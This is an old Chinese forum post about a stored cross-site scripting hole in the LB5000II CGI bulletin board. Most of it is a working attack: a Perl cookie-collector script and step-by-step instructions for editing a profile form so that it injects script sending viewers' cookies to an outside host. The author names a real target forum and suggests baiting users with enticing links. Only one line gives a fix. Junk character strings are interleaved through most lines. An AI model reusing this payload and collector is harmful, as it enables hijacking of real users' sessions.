漏洞描述:
4 b3 L0 R" \* q4 L LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
' x5 Z9 z0 ?- ]6 x8 K版本是LB5000II v20317b,可以http://www.leoboard.com下载。 2 ]8 D5 d# e& _& Q, S
其注册模块未过滤用户资料 最高学历:职业状况:等注册信息 9 D3 H$ U8 T# u+ [ s3 E
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
( \, l* I( H& N! t进行攻击,进一步可以通过某中方式收集。测试通过
1 B+ p' X3 e/ E* v' j$ @* y( X# {测试程序:
/ [! q0 D' r* b5 [) A 参考漏洞描述。 2 l* P6 d4 f8 _- K k1 r C9 k4 o& b
解决方案:
. h3 z* t) F. i 对用户提交的资料进行过滤
9 [2 J( L. M4 D+ Q0 \
+ r) i( ^8 z% b9 }! w2 c. h' l' o0 C7 s8 P& N; Y7 U/ r
请在s8s8论坛访问 + f# p5 s. q |. B: G9 r
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队 $ \4 j( p7 z r0 c+ e, p
那么你在s8s8.net 的cookie将被我所获取.
' [- X6 m5 m9 z! G W7 Z#!/usr/bin/perl % s5 f' q& J4 J4 S7 @2 K
#leo.cgi
" x" U: d. l1 {- `$url="http://www.s8s8.net";; : X' F% v- T( s/ r% T# X+ i$ E
$method=$ENV{"REQUEST_METHOD"}; % l. K! v. |7 H' E2 I
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
- J% x& j" l! {* n" oelse{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
6 Q& V! T2 k/ C3 y9 k$remote_addr=$ENV{"REMOTE_ADDR"}; $ H6 e6 { d3 H) ^8 Q: C! K
$buffer=~tr/+/ /; 4 \- K. i: C0 [& c; Z$ [5 T) m. E( t
$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg;
& Y* m' F' V* S7 M, D$buffer=$buffer."|$remote_addr\n";
0 G% k, L( g9 O; J4 [open(FILE,">>leo.txt");
* _( D( p! e* i0 pprint FILE $buffer;
" A9 D" @% x3 U7 X% J. {% `close(FILE); & Y6 [' l* {. M! C2 \+ z
print "Location:$url\n\n"; . y' t5 K, U! S
上面是我的cookie收集脚本
2 `8 O' s: R5 m$ D6 _- Z& r& K( @------------------------------------------------------------------------------ ! B; L, P. }2 e
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试 0 i- t5 D' D5 \
用大刀队登陆s8s8论坛,编辑个人资料, + K, [8 V: K0 u- B* ~% n \
用记事本打开编辑网页
% r( Y% Z. s! d2 g1 u$ y<option value="中专">中专</option> 这一项改成 6 q4 K7 U+ P, o/ r' C6 B) w
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?'+documents.cookie)</s cript>">中专</option>
, p0 Y/ Q9 B) y: Y" c1 V3 h% ^7 z! l* Z( v$ U
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> 4 m( _4 P7 G, i1 v
改为 6 O$ N- c1 n- U$ x( h2 B
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
! e6 Z& l! O. M z保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
; Q! D- f% ^* y# S4 p/ N& m这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。
6 p* F& \+ Y3 J7 K$ B8 u为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
" E4 T9 p1 l) g" d- ~+ p" x什么算诱惑力呢,自己发挥吧。
7 O& D4 m+ }/ V' t! n1 Z0 ?5 C7 b6 j |
粤公网安备44152102000001号 
发表于 2002-6-6 11:05:22
发表于 2002-6-24 19:03:26